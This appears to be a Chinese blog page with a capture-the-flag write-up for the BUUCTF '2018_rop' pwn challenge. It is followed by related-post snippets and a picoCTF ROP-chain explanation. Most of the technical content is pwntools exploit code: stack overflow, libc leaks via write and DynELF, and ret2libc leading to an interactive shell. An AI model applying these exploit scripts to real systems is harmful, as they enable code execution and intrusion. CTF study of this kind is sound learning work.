铁人三项(第五赛区)2018 rop

最新推荐文章于 2025-01-17 19:02:19 发布
原创 最新推荐文章于 2025-01-17 19:02:19 发布 · 590 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何使用ROP技术在CTF竞赛中利用内存泄漏和动态链接库解析来实现任意地址读写,最终获取shell的过程。通过具体代码示例,读者可以了解ROP攻击的原理和实践步骤。 
from pwn import *
p = process('./2018_rop')

gotwrite = 0x0804A010
pltwrite = 0x080483A0
start = 0x080483C0
bss = 0x0804A020
pltread = 0x08048360

def leak(address):
    payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04) 
    p.sendline(payload)
    leakaddress = p.recv(4)
    return leakaddress

d = DynELF(leak, elf=ELF('./2018_rop'))
system_addr = d.lookup('system', 'libc')
payload = 'a' * 140 + p32(pltread) + p32(start) + p32(0) + p32(bss) + p32(8)
p.send(payload)
p.send("/bin/sh\0")
payload = 'a' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(bss)
p.sendline(payload)
p.interactive()
BUUCTF--铁人三项(第五赛区)_2018_rop1
qq_30528603的博客
01-08 905
我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。漏洞点主要在vulnerable_function()函数中。1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序。2.通过计算算出libc基地址进一步得到system地址。这题是一题标准的rop。3.找到libc中bin/sh的位置。4.第二次布局就是直接布置rop
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)
空城惜梦的博客
06-04 1729
@[TOC]( [PWN] BUUCTF 铁人三项(第五赛区)_2018_rop)
BUUCTF 铁人三项(第五赛区)_2018_rop
2401_88087539的博客
01-17 406
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
铁人三项(第五赛区)_2018_rop
、moddemod
06-20 762
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './2018_rop' p = process(proc_name) p = remote('node3.buuoj.cn', 25414) elf = ELF(proc_name) write_plt = elf.plt['write'] read_.
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 474
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop题解
BUUCTF pwn——铁人三项(第五赛区)_2018_rop
CNS-Enterprise BCC-1701-J
04-10 209
BUUCTF 做题练习
Pwn-最简单栈溢出(2018铁三云贵赛区)write函数泄露+用地址跳回重执行主函数
publicStr的博客
05-16 4751
开始前的例行叨叨:这大概是最简单的pwn题了吧,直接溢出的。主要是记录下write函数泄露动态地址的姿势,还有程序执行完一次就退出了,如何在溢出的末尾让它重执行,以及从lic中提取地址的姿势。...
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 292
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 431
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 875
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 577
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 341
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
buuctf 铁人三项(第五赛区)_2018_rop
carol2358的博客
04-26 442
常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西 exp: from pwn import * from LibcSearcher import * local_file = './2018_rop' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 ...
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 8万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 241
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
picoctf_2018_rop chain 1这是什么原理
最新发布
07-20
### 栈溢出与ROP链的基本原理 在`picoCTF_2018_rop_chain`题目中,漏洞函数`vuln()`中使用了`gets()`函数,导致了缓冲区溢出问题。攻击者可以通过精心构造的输入覆盖栈上的返回地址,从而控制程序流。由于开启了NX保护,无法直接执行shellcode,因此需要使用ROP(Return Oriented Programming)技术来绕过保护机制。 ### win_function1和win_function2的作用 题目中的`win_function1()`和`win_function2(int a1)`函数用于设置两个全局变量`win1`和`win2`的值。只有当这两个变量都被设置为1,并且传递给`flag()`函数的参数`a1`等于`0xDEADBAAD`(即-559039827),才能触发打印flag的操作。具体来说: - `win_function1()`将`win1`设置为1。 - `win_function2(int a1)`只有在`win1`为1且传入的参数`a1`等于`0xBAAAAAAD`(即-1163220307)时,才会将`win2`设置为1[^1]。 ### 构造ROP链的过程 为了满足上述条件,攻击者需要构造一个ROP链,依次调用`win_function1`、`win_function2`和`flag`函数,并正确传递参数。具体步骤如下: 1. **填充缓冲区**:首先需要填充足够的字节(例如`0x18`字节)以覆盖缓冲区,直到覆盖到返回地址的位置。 2. **调用win_function1**:由于`win_function1`不需要参数,因此直接调用即可。此时`win1`被设置为1。 3. **调用win_function2**:为了使`win2`被设置为1,需要在调用`win_function2`时传递参数`0xBAAAAAAD`。 4. **调用flag函数**:最后调用`flag`函数,并传递参数`0xDEADBAAD`,以满足条件并打印flag[^3]。 ### 示例代码 以下是构造payload的具体Python代码示例,使用了`pwntools`库来简化ROP链的构造过程: ```python from pwn import * # 连接到目标服务 io = process("./PicoCTF_2018_rop_chain") elf = ELF('./PicoCTF_2018_rop_chain') # 获取函数地址 win1_addr = elf.symbols['win_function1'] win2_addr = elf.symbols['win_function2'] flag_addr = elf.symbols['flag'] # 构造payload payload = b'a' * (0x18 + 4) # 填充缓冲区 payload += p32(win1_addr) # 调用win_function1 payload += p32(win2_addr) # 调用win_function2 payload += p32(flag_addr) # 调用flag函数 payload += p32(0xBAAAAAAD) # win_function2的参数 payload += p32(0xDEADBAAD) # flag函数的参数 # 发送payload io.sendlineafter("Enter your input> ", payload) io.interactive() ``` ### 栈帧结构的构造 在构造ROP链时,需要特别注意栈帧结构的布局。每个函数调用后,返回地址会被压入栈中。因此,需要确保每个函数调用后的返回地址指向下一个函数的入口,并且参数正确传递。具体来说: - `win_function1`的调用不需要参数,因此只需在其后放置`win_function2`的地址。 - `win_function2`需要一个参数`0xBAAAAAAD`,因此在其后放置该参数。 - `flag`函数需要一个参数`0xDEADBAAD`,因此在其后放置该参数[^4]。 通过这种方式,可以逐步构建出满足条件的ROP链,最终触发flag的打印。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值